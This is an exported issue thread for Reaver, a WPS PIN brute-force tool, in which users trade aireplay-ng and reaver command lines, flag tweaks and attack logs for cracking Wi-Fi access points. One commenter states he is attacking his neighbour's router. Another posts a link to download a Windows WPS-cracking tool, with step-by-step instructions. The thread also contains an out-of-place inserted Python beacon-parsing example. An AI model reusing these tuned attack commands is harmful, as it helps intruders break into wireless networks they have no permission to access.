hotelzululima / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

WPS transaction failed (code: 0x2), Causes lock up #125

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
It's a rare event, but when I get a "WPS transaction failed (code: 0x2)" Reaver 
stops functioning.

I also get a few "WPS transaction failed (code: 0x3)", 
but it doesn't lock up on them. First noticed in r84, switched to r87 and it 
still occurs.

Original issue reported on code.google.com by Sca...@gmail.com on 11 Jan 2012 at 11:31

GoogleCodeExporter commented 9 years ago
Command line:
reaver -i mon0 -b 00:26:5A:XX:XX:XX -E -S -t 10 -T 1 -w -vv

Original comment by Sca...@gmail.com on 12 Jan 2012 at 12:12

GoogleCodeExporter commented 9 years ago
Define "reaver stops functioning". Does it sit there and do nothing? Does it 
keep attempting the same pin? What errors/warnings does it display?

Code 2 means Reaver hit a receive timeout. Code 3 means it received an EAP 
failure packet. In either case Reaver should keep trying pins.

Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 12:14

GoogleCodeExporter commented 9 years ago
It just sits there and does nothing.

[+] Trying pin 94965674
[+] Sending EAPOL START request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin

Always in this order; I have waited 10+ minutes (4 seconds/attempt).
Code 0x3 does keep running.

Let me know how and what other information might help.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 1:08

GoogleCodeExporter commented 9 years ago
Well Reaver isn't doing nothing. :)  It's attempting to initiate a WPS session 
with the AP, but it looks like the AP is simply not responding to Reaver's 
identity response packet. I have seen instances where APs can get stuck in a 
wait state and don't respond for several minutes, but it usually clears up 
after 2 minutes or so.

If you stop and re-start Reaver, do you keep getting the same timeout messages? 
Can you capture the traffic and provide the pcap?

Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 2:11

GoogleCodeExporter commented 9 years ago
If you stop and restart Reaver, it will just continue properly, 
until it hits a code 0x2 again.

I will make a capture after work.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:34

GoogleCodeExporter commented 9 years ago
Did another run before updating, it locked up.
Then updated to r90 and it doesn't seem to lock up anymore.

So seems like this issue was resolved in r89.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:16

GoogleCodeExporter commented 9 years ago
Spoke too early. I'll attempt to capture it now.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:31

GoogleCodeExporter commented 9 years ago
So I figured it out: it locks up because the router hops to a new channel, 
and Reaver doesn't return to a channel-looking state. If I change the channel 
using airodump it will continue.

I have a cap file if you like, but I don't think it will be useful, since when 
it hops channel it stops recording.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:46

GoogleCodeExporter commented 9 years ago
There was a channel hopping bug, but r85 should have fixed this and should 
identify when an AP has changed channels and switch to the appropriate channel. 
It won't channel hop if you explicitly specify the channel number, or give it 
the --fixed option (which it doesn't look like you are doing). Can you provide 
a pcap of the beacon packets before and after the AP channel hops?

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 5:13
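The comment above says r85 follows an AP by reading its channel from the beacons it sends. As an added example (not Reaver's code, and not from anyone on this thread), the parser below pulls the channel out of a beacon's DS Parameter Set IE (falling back to the HT Operation primary channel when the DS IE is absent) and reports when a BSSID moves, which is the same check a capture tool or a rogue-AP monitor needs. The beacons are constructed in `make_beacon`, not captured.

```python
import struct

MAC_HDR_LEN = 24       # 802.11 management frame MAC header
BEACON_FIXED_LEN = 12  # timestamp(8) + beacon interval(2) + capabilities(2)
IE_SSID, IE_DS_PARAM, IE_HT_OPERATION = 0, 3, 61


def parse_ies(body):
    """Yield (element id, data) pairs from a beacon's tagged parameters."""
    off = 0
    while off + 2 <= len(body):
        ie_id, ie_len = body[off], body[off + 1]
        data = body[off + 2: off + 2 + ie_len]
        if len(data) < ie_len:  # truncated frame: stop instead of mis-parsing
            break
        yield ie_id, data
        off += 2 + ie_len


def beacon_channel(frame):
    """Return (bssid, ssid, channel) from a raw beacon.

    channel is None when neither a DS Parameter Set nor an HT Operation
    element is present (e.g. a damaged or unusual beacon)."""
    if len(frame) < MAC_HDR_LEN + BEACON_FIXED_LEN:
        raise ValueError("frame too short for a beacon")
    if frame[0] & 0xFC != 0x80:  # type=management(0), subtype=beacon(8)
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02X}" for b in frame[16:22])  # addr3 = BSSID
    ssid, channel = None, None
    for ie_id, data in parse_ies(frame[MAC_HDR_LEN + BEACON_FIXED_LEN:]):
        if ie_id == IE_SSID:
            ssid = data.decode("utf-8", "replace")
        elif ie_id == IE_DS_PARAM and len(data) == 1:
            channel = data[0]
        elif ie_id == IE_HT_OPERATION and channel is None and data:
            channel = data[0]  # first octet is the primary channel
    return bssid, ssid, channel


class ChannelTracker:
    """Remember the last channel seen per BSSID and report hops."""

    def __init__(self):
        self.last = {}

    def observe(self, frame):
        """Return (bssid, old_channel, new_channel) on a hop, else None."""
        bssid, _ssid, ch = beacon_channel(frame)
        prev = self.last.get(bssid)
        self.last[bssid] = ch
        if prev is not None and ch is not None and ch != prev:
            return bssid, prev, ch
        return None


def make_beacon(bssid, ssid, channel):
    """Constructed sample beacon (not a real capture) for offline testing."""
    hdr = bytes([0x80, 0x00, 0, 0]) + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0411)
    ies = bytes([IE_SSID, len(ssid)]) + ssid + bytes([IE_DS_PARAM, 1, channel])
    return hdr + fixed + ies
```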

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Hi, I'm really thankful for your continued attempts to fix bugs and 
incompatibilities, even though I've never seen Reaver work with my own eyes.

Using r97 I have transaction failures (codes 0x3 and 0x2), and I receive 2 M1 
packets.

Information:
- Signal strength is -60 but last time I checked it was the same with -40.
- Still using Intel Wireless Link 5100 (iwlagn) and BT5 R1 Gnome 32-bit against 
a Livebox 2 (router Sagem F@st 3xxx) with a 12345670 default PIN.
- Again I'm sorry for providing no pcap.

Shell #1: aireplay-ng mon0 --fakeauth 600 -a xx:xx:xx:xx:xx:xx -e Livebox-XXXX
Shell #2: sudo reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv -A

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Switching mon0 to channel 6
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: Livebox-XXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin
// (repeat from line 4)
^C
[+] Nothing done, nothing to save.

Original comment by b1957...@nwldx.com on 16 Jan 2012 at 11:11

GoogleCodeExporter commented 9 years ago
Try experimenting with other WLAN adapters and APs.

Original comment by patricks...@gmail.com on 16 Jan 2012 at 11:16

GoogleCodeExporter commented 9 years ago
I tried on different kind of APs without success, but yes I intend to double 
check regularly. I could not check r97 on another AP yet. And unfortunately I 
don't have another adapter with a BT5 driver capable of injection. >_<

I am also fiddling every now and then with wpa_cli and wpa_supplicant to check 
whether I can connect to APs using a correct PIN but no WPA key. (if wpa_cli 
can't do this, then how could Reaver? Failure should prove that it's not a 
Reaver issue and remove a thorn in Cheff's side, I'd say... I'm not using 
wpa_cli/wpa_supplicant correctly yet though, still learning)

Also, is there any approximate date for Reaver integration within Aircrack lib?

Original comment by b1957...@nwldx.com on 16 Jan 2012 at 11:29

GoogleCodeExporter commented 9 years ago
A branch has been created in the aircrack-ng project for reaver. Version 1.2 is 
about to be released, so reaver will be included in the 1.3 release, though I 
can't say when that will be.

Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 1:17

GoogleCodeExporter commented 9 years ago
I'll keep an eye on that branch then. Thanks for your patience. :) *tiptoes 
away*

Original comment by b1957...@nwldx.com on 17 Jan 2012 at 5:34

GoogleCodeExporter commented 9 years ago
I've experienced the same issues using an Alfa rtl8187. I've found the solution 
to the problem is to play with the "-d" flag.

Start at "-d 15" or higher until you stop receiving the (code: 0x02) (code: 
0x03) errors. Then work your way down. Each router I've tested likes a 
different value. 

I was also using the "--no-nacks" argument.

Original comment by cryptom...@gmail.com on 4 Feb 2012 at 6:04

GoogleCodeExporter commented 9 years ago
I'm using an Alfa rtl8187, Reaver 1.4.

Found this way to make it work:

1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7

Hope this helps ;)

Original comment by itmanvn on 12 Feb 2012 at 2:40

GoogleCodeExporter commented 9 years ago
>>I'm using ALfa rtl8187. reaver 1.4
>>
>>found this way to make it work
>>
>>1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
>>2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7
>>
>>hope this help ;)

Thank you for this comment! This worked for me. Kind of. I'm also using an Alfa 
rtl8187; reaver 1.4 on BT5. As I was saying, this worked for me but now I am 
stuck at 20.XX% seemingly because aireplay can no longer attack the AP. The 
reason I say seemingly, is because I've tried over 5 different APs and I cannot 
get the same method to work again even though aireplay does work on them. 

root@root:~# sudo aireplay-ng mon0 -1 120 -a XX:XX:XX:XX:XX -e linksys
No source MAC (-h) specified. Using the device MAC (XX:XX:XX:XX:XX:XX)
09:06:51  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 1

09:06:51  Sending Authentication Request (Open System)
09:06:53  Sending Authentication Request (Open System)
09:06:55  Sending Authentication Request (Open System)
09:06:57  Sending Authentication Request (Open System)
09:06:59  Sending Authentication Request (Open System)
09:07:01  Sending Authentication Request (Open System)
09:07:03  Sending Authentication Request (Open System)
09:07:05  Sending Authentication Request (Open System)
09:07:07  Sending Authentication Request (Open System)
09:07:09  Sending Authentication Request (Open System)
09:07:11  Sending Authentication Request (Open System)
09:07:13  Sending Authentication Request (Open System)
09:07:15  Sending Authentication Request (Open System)
09:07:17  Sending Authentication Request (Open System)
09:07:19  Sending Authentication Request (Open System)
09:07:21  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@root:~# sudo reaver -i mon0 -A -b XX:XX:XX:XX:XX:XX -c 1 -vv --no-nacks --win7

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: linksys)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures

root@root:~# aireplay-ng --test -e linksys -a XX:XX:XX:XX:XX:XX mon0
09:09:33  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 1
09:09:33  Trying broadcast probe requests...
09:09:33  Injection is working!
09:09:35  Found 1 AP 

09:09:35  Trying directed probe requests...
09:09:35  XX:XX:XX:XX:XX:XX - channel: 1 - 'linksys'
09:09:36  Ping (min/avg/max): 4.586ms/36.119ms/46.289ms Power: -39.83
09:09:36  30/30: 100%

Any comments or suggestions would be greatly appreciated!

Original comment by shoredit...@gmail.com on 20 Feb 2012 at 8:20

GoogleCodeExporter commented 9 years ago
Start airodump-ng and scan the -bssid of the selected network on the selected 
-channel, then start Reaver using the options -S -N -L. Worked excellently for me....

Original comment by bmark...@vus.hr on 20 Feb 2012 at 9:06

GoogleCodeExporter commented 9 years ago
Most likely the AP you are trying to associate with accepts connections only 
from certain MAC addresses; in other words, it has a MAC filter.

Original comment by AntonR...@gmail.com on 21 Feb 2012 at 12:15

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Comment 19 worked!

So we have 2 steps

1. aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XX mon0 --ignore-negative-one

10:39:13  Sending Authentication Request (Open System) [ACK]
10:39:13  Authentication successful
10:39:13  Sending Association Request [ACK]
10:39:13  Association successful :-) (AID: 1)

Start new terminal

2. reaver -A -b XX:XX:XX:XX:XX:XX -c 11 -vv -i mon0 --dh-small --no-nacks --ignore-locks --win7 -d 15

[+] 2.02% complete @ 2012-02-21 10:36:40 (31 seconds/pin)

If you get the error "WPS transaction failed (code: 0x02), re-trying last pin", 
just increase the -d value, e.g. -d 20, -d 25 and so on ;)

Original comment by itmanvn on 21 Feb 2012 at 3:40

GoogleCodeExporter commented 9 years ago
I have successfully Reaver hacked my old backup Netgear router, even though it 
took a very long time, as it would shut down after 20 or so attempts and then 
time out for 5 minutes. 
I'm now trying to prove my neighbor wrong and hack his router. I had to show 
him that WEP was not good, you would think he would believe me about WPA now. 
Anyway. When I try his router it gets to [+] Sending M4 (after the first PIN 
attempt) and then will not respond. I've tried everything I could think of and 
can never get a response after M4. 
I was hoping to try the aireplay Assoc method above, but when I try to use the 
-A setting Reaver still seems to want to associate with it. What am I doing 
wrong? 
I started aireplay, then did 

# reaver -A -b 00:1C:DF:XX:XX:XX -c 6 -vv -i mon0 --dh-small --no-nacks --ignore-locks --win7 -d 15

but got this response (still Associating);

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:1C:DF:XX:XX:XX
[+] Associated with 00:1C:DF:CC:AE:54 (ESSID: XXXXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message

Original comment by Curtis.B...@gmail.com on 21 Feb 2012 at 7:58

GoogleCodeExporter commented 9 years ago
So I am having the same exact issue as the post directly above: when running 
Reaver on my Cisco WAP4410N access point, after trying the first pin or so, 
Reaver gets stuck at Sending M4 Message.... Is the access point locking up and 
not allowing attempts anymore? Could using the --ignore-locks option help at 
all? I am pretty confused about this because I have tried it with other access 
points and it worked OK...

Original comment by mayangvi...@gmail.com on 22 Feb 2012 at 2:35

GoogleCodeExporter commented 9 years ago
When I use reaver -i mon0 -b (bssid) it gives 
WARNING: Failed to associate with (bssid)
Then I used reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 11 -e network_name -vv -A. 
It did associate with the BSSID, but then it gets stuck.

sfz420@gmail.com

Original comment by sfz...@gmail.com on 22 Mar 2012 at 7:41

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
This seems to work for me.
Terminal 1:
 aireplay-ng mon0 -1 120 -a B0:48:7A:**:**:** -q 5

Terminal 2:
reaver -i mon0 -c 1 -b B0:48:7A:**:**:** -d 10 -x 3 -r 5:3 -N -S -L -vv --win7

Hope this helps someone.

Original comment by jamesde...@gmail.com on 25 Jan 2013 at 11:05

GoogleCodeExporter commented 9 years ago
I have the same problem, any help please.... 
Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin

Original comment by asjadme...@gmail.com on 6 May 2013 at 1:10

GoogleCodeExporter commented 9 years ago
Is there any definitive solution to this issue? I use the AWUS036H adapter and 
always get the "WPS transaction failed". 

Original comment by ivan.si...@gmail.com on 2 Aug 2013 at 10:13

GoogleCodeExporter commented 9 years ago
While hacking a SegamCom router with Reaver it gets stuck at
Trying Pin 12345670

and stops there. Is there any solution to hack SegamCom routers via Reaver 
while WPS-Locked is No?

Help is required, brothers.

Original comment by farrukhb...@gmail.com on 20 Dec 2013 at 6:27

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
I always get stuck by wps transaction failed.

Original comment by bobowong...@gmail.com on 28 Apr 2014 at 3:05

GoogleCodeExporter commented 9 years ago
Is there a fix? Same problem here, always.

Original comment by M.K.Zer...@gmail.com on 24 Oct 2014 at 12:27

GoogleCodeExporter commented 9 years ago
Can someone out there please help.

Original comment by kkchiu...@gmail.com on 19 Jan 2015 at 8:28

GoogleCodeExporter commented 9 years ago
Hi, you can also use Dummper on the Windows platform!
Just scan networks and select any on which WPS is available and brute force with 
this guide:

Please first install WinCap.exe & JumpStart.exe,
then run Dummper.exe (portable). Running the latest version is recommended.
In Dummper => Redes tab, select your network interface card (NIC),
then go to the WPS tab and click the Todas Les Redes radio button.
In the next step, click on the Scan button and select the network which you want 
to hack!
Then click on the Jump Start button under the list and wait for it to hack your 
selected network!
Good luck ;)

Download the required software from Mediafire.com:
https://www.mediafire.com/?l61rh7q0z6izcxi

Original comment by sashah...@gmail.com on 19 Jan 2015 at 3:54

GoogleCodeExporter commented 9 years ago
This is my set up. 
I have an Alfa AWUS036NHA - VirtualBox on Windows 7

My problem is that Reaver fails to associate every so often, therefore I can't 
leave it running overnight, because when it fails I have to manually 
associate with the AP. 

I was wondering if there is a command that I can use to automatically 
re-associate without having to run airodump.

If it gets stuck, or fails at associating, I just do airodump-ng mon0. I wait 
10 seconds or so and proceed to run Reaver. When I get

WARNING: Failed to associate with <macaddress> (ESSID: xxxxxx)

I quit the process and have to re-associate. Anyways, here is my Reaver command that works for me.

reaver -i mon0 -b <mac> -S -N -a -c <channel> -vv -r 17:30

How often does Reaver have to associate? Is there a reason why it loses its 
association? 

Thank you !

Original comment by fraf...@gmail.com on 15 Feb 2015 at 4:35